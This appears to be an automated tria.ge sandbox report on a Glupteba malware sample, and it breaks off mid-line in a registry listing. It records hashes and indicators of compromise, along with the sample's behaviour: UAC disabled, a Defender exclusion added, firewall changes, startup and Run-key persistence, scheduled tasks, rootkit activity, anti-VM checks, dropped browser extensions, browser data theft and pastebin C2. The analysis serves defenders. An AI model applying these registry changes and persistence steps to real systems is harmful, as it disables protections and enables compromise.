Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
04/02/2024, 20:53
Static task
static1
Behavioral task
behavioral1
Sample
ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Resource
win10v2004-20231215-en
General
-
Target
ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
-
Size
735KB
-
MD5
9f5cb3a9a4053a53063a9da9afbf6273
-
SHA1
b1ad9fe9cd4e8ddf11909751a2e0334c86ff206e
-
SHA256
ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1
-
SHA512
aaa720bb50f26f0508f1a3403da7189e7915c5663f08b35dd35299bfb6815c3f20bfb143d35cb57a0a95f623505809434ec28ecb7b90374e674a40381c079b26
-
SSDEEP
12288:xYRY4kQvFK/hSB8W5yWz2izHvqIknzbUtaD0Drt+/wQVbAV:/48SB8W5lzfqIknzCaoDWwWA
Malware Config
Signatures
-
Glupteba payload 11 IoCs
resource yara_rule behavioral3/memory/4636-80-0x0000000002DA0000-0x000000000368B000-memory.dmp family_glupteba behavioral3/memory/4636-149-0x0000000002DA0000-0x000000000368B000-memory.dmp family_glupteba behavioral3/memory/4480-103-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral3/memory/4636-86-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral3/memory/4636-351-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral3/memory/1172-428-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral3/memory/2952-429-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral3/memory/2952-455-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral3/memory/1148-672-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral3/memory/1148-739-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral3/memory/1148-799-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" WerFault.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths WerFault.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe = "0" WerFault.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 109 4188 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1992 netsh.exe 2864 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation SpBYaRE.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation Install.exe -
Drops startup file 7 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HAAVzqISfWWTFAKj8XxWfqxG.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8fTwAv9vvrzQmDtY6BoQSPqp.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kMWr0wHbciJz2T8PIzbDDq7L.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6YgKYAljibHd7hmL9ANkwjRt.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f9A0y7Eq7xLvMxWOfVhUsPyD.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xYnx6NsuAmJY1idCymJ7UgP0.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SLuMe9J8yhRQoNJbmY4SEeii.bat CasPol.exe -
Executes dropped EXE 24 IoCs
pid Process 4636 cPQQU4ymXIiQrXbc4lY3hAxs.exe 4480 LhAVHTNnye4bvT2Dg2S6kl8j.exe 2952 LhAVHTNnye4bvT2Dg2S6kl8j.exe 1172 cPQQU4ymXIiQrXbc4lY3hAxs.exe 3428 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 4712 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 4604 schtasks.exe 332 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 1492 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 1148 csrss.exe 3668 7wENfwA4vu2U4MiIr5SlUNvb.exe 4072 Install.exe 4428 Assistant_106.0.4998.16_Setup.exe_sfx.exe 1500 assistant_installer.exe 2328 Install.exe 4900 assistant_installer.exe 3948 uHxENSgCxloCFHT7NHBQrwTP.exe 4620 injector.exe 1856 jTKkLDWW97ArlwvIoFA1XRD3.exe 2148 jTKkLDWW97ArlwvIoFA1XRD3.tmp 972 windefender.exe 1088 windefender.exe 3544 wAuDLfm.exe 5056 SpBYaRE.exe -
Loads dropped DLL 10 IoCs
pid Process 3428 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 4712 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 4604 schtasks.exe 332 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 1492 iJlEkkLqIhtnHVfNj6uUp1Lx.exe 1500 assistant_installer.exe 1500 assistant_installer.exe 4900 assistant_installer.exe 4900 assistant_installer.exe 4188 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral3/files/0x0006000000023237-253.dat upx behavioral3/files/0x0006000000023237-279.dat upx behavioral3/files/0x0006000000023237-285.dat upx behavioral3/files/0x000600000002324a-270.dat upx behavioral3/files/0x0006000000023237-260.dat upx behavioral3/files/0x0006000000023237-241.dat upx behavioral3/files/0x000d00000002329d-710.dat upx behavioral3/files/0x000d00000002329d-712.dat upx behavioral3/memory/972-714-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral3/files/0x000d00000002329d-709.dat upx behavioral3/memory/1088-731-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral3/memory/1088-785-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" LhAVHTNnye4bvT2Dg2S6kl8j.exe Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast Install.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json SpBYaRE.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json SpBYaRE.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini SpBYaRE.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: iJlEkkLqIhtnHVfNj6uUp1Lx.exe File opened (read-only) \??\F: iJlEkkLqIhtnHVfNj6uUp1Lx.exe File opened (read-only) \??\D: iJlEkkLqIhtnHVfNj6uUp1Lx.exe File opened (read-only) \??\F: iJlEkkLqIhtnHVfNj6uUp1Lx.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 pastebin.com 10 pastebin.com -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 38 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol wAuDLfm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData SpBYaRE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache SpBYaRE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive WerFault.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SpBYaRE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive reg.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini wAuDLfm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Assistant_106.0.4998.16_Setup.exe_sfx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C SpBYaRE.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive WerFault.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SpBYaRE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies SpBYaRE.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3624 set thread context of 688 3624 WerFault.exe 85 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN cPQQU4ymXIiQrXbc4lY3hAxs.exe File opened (read-only) \??\VBoxMiniRdrDN LhAVHTNnye4bvT2Dg2S6kl8j.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak SpBYaRE.exe File created C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\jkyOFTR.xml SpBYaRE.exe File created C:\Program Files (x86)\TewsSzADpkOsC\GQJHbtW.dll SpBYaRE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi SpBYaRE.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak SpBYaRE.exe File created C:\Program Files (x86)\AplGwAcKU\oHToYYL.xml SpBYaRE.exe File created C:\Program Files (x86)\hzVOasbgcFlU2\bclVQCUXCGBTb.dll SpBYaRE.exe File created C:\Program Files (x86)\hzVOasbgcFlU2\cpFTsmd.xml SpBYaRE.exe File created C:\Program Files (x86)\AplGwAcKU\cVCXGT.dll SpBYaRE.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi SpBYaRE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja SpBYaRE.exe File created C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\YZobnZX.dll SpBYaRE.exe File created C:\Program Files (x86)\TewsSzADpkOsC\MjJFTxc.xml SpBYaRE.exe File created C:\Program Files (x86)\ZmXCVzpeviUn\dyiSuDm.dll SpBYaRE.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File opened for modification C:\Windows\rss cPQQU4ymXIiQrXbc4lY3hAxs.exe File created C:\Windows\Tasks\bvgvHgqNgKCzXIKVFa.job schtasks.exe File created C:\Windows\Tasks\dHRDOHpkQTLgzSbMl.job schtasks.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\rss\csrss.exe LhAVHTNnye4bvT2Dg2S6kl8j.exe File created C:\Windows\unins000.dat jTKkLDWW97ArlwvIoFA1XRD3.tmp File created C:\Windows\is-EF478.tmp jTKkLDWW97ArlwvIoFA1XRD3.tmp File created C:\Windows\Tasks\rzGcUtIiGGHHJZZ.job schtasks.exe File created C:\Windows\Tasks\XwMyCejzLOqQPkTJD.job schtasks.exe File created C:\Windows\rss\csrss.exe cPQQU4ymXIiQrXbc4lY3hAxs.exe File opened for modification C:\Windows\rss LhAVHTNnye4bvT2Dg2S6kl8j.exe File opened for modification C:\Windows\unins000.dat jTKkLDWW97ArlwvIoFA1XRD3.tmp -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4852 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
pid pid_target Process procid_target 3844 4636 WerFault.exe 88 2464 4636 WerFault.exe 88 1348 4480 WerFault.exe 4032 4480 WerFault.exe 3528 4636 WerFault.exe 88 556 4480 WerFault.exe 2536 4480 WerFault.exe 3684 4480 WerFault.exe 1500 4480 WerFault.exe 4376 4480 WerFault.exe 3912 4636 WerFault.exe 88 5028 4480 WerFault.exe 3452 4480 WerFault.exe 1620 4636 WerFault.exe 88 3428 4636 WerFault.exe 88 2092 4480 WerFault.exe 1524 4480 WerFault.exe 2504 4480 WerFault.exe 776 4480 WerFault.exe 2424 4480 WerFault.exe 3260 4480 WerFault.exe 2344 4636 WerFault.exe 88 4124 4636 WerFault.exe 88 4456 4636 WerFault.exe 88 3856 4636 WerFault.exe 88 3284 4636 WerFault.exe 88 1164 4480 WerFault.exe 4084 4636 WerFault.exe 88 3680 4636 WerFault.exe 88 1300 4480 WerFault.exe 4056 4636 WerFault.exe 88 1100 4480 WerFault.exe 1680 4636 WerFault.exe 88 3688 4480 WerFault.exe 2740 4636 WerFault.exe 88 4792 2952 WerFault.exe 172 780 1172 WerFault.exe 170 856 2952 WerFault.exe 172 1844 1172 WerFault.exe 170 1064 1172 WerFault.exe 170 1072 2952 WerFault.exe 172 3412 2952 WerFault.exe 172 2684 2952 WerFault.exe 172 4924 1172 WerFault.exe 170 1932 2952 WerFault.exe 172 3952 1172 WerFault.exe 170 5000 1172 WerFault.exe 170 3428 2952 WerFault.exe 172 4948 1172 WerFault.exe 170 3008 2952 WerFault.exe 172 3312 1172 WerFault.exe 170 3768 2952 WerFault.exe 172 4640 1172 WerFault.exe 170 5056 4636 WerFault.exe 88 3064 4636 WerFault.exe 88 60 4636 WerFault.exe 88 2708 1148 WerFault.exe 240 3668 1148 WerFault.exe 240 2636 1148 WerFault.exe 240 4388 1148 WerFault.exe 240 2344 1148 WerFault.exe 240 4428 1148 WerFault.exe 240 3584 1148 WerFault.exe 240 1788 1148 WerFault.exe 240 -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2384 schtasks.exe 4832 schtasks.exe 3608 schtasks.exe 2116 schtasks.exe 2928 schtasks.exe 3288 schtasks.exe 2428 schtasks.exe 2100 schtasks.exe 2344 schtasks.exe 1896 schtasks.exe 3496 schtasks.exe 2484 schtasks.exe 3596 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2871 = "Magallanes Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WerFault.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-162 = "Central Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs Assistant_106.0.4998.16_Setup.exe_sfx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Assistant_106.0.4998.16_Setup.exe_sfx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket SpBYaRE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WerFault.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2891 = "Sudan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" cPQQU4ymXIiQrXbc4lY3hAxs.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet 